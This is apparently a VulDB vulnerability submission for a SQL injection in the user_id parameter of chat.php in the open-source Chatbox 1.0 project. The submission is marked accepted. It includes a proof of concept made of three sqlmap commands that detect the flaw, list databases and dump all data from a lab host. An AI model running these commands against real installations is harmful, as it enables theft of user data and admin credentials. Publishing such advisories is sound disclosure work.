提出 #636884: shafhasan Chatbox 1.0 1.0 SQL Injection情報

タイトルshafhasan Chatbox 1.0 1.0 SQL Injection
説明Title of the Vulnerability: Chatbox 1.0 | chat.php?user_id= SQL Injection | Found By Maloy Roy Orko Vulnerability Class: SQL Injection Product Name: Chatbox 1.0 CWE:89 Vendor: https://github.com/shafhasan/ Vulnerable Product Link: https://github.com/shafhasan/chatbox Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too. Product & Service Introduction: Chatbox 1.0 using JavaScript and PHP Exploitation POC via SQLmap: (1) Vulnerability Search: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 (2) Database Dumping: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dbs (3) Dumping All Data: python2 sqlmap.py -u http://192.168.0.103:8080/chat/chat.php?user_id=1268013315 --cookie PHPSESSID=8a47fdeb190bb3842ea9d1fb77a64bb4 --dump Full Detailed POC: https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
ソース⚠️ https://www.websecurityinsights.my.id/2025/08/chatbox-10-chatphpuserid-sql-injection.html
ユーザー
 MaloyRoyOrko (UID 79572)
送信2025年08月18日 18:51 (8 月 ago)
モデレーション2025年08月29日 08:48 (11 days later)
ステータス承諾済み
VulDBエントリ321859 [shafhasan chatbox 迄 156a39cde62f78532c3265a70eda12c70907e56f /chat.php user_id SQLインジェクション]
ポイント20

Interested in the pricing of exploits?

See the underground prices here!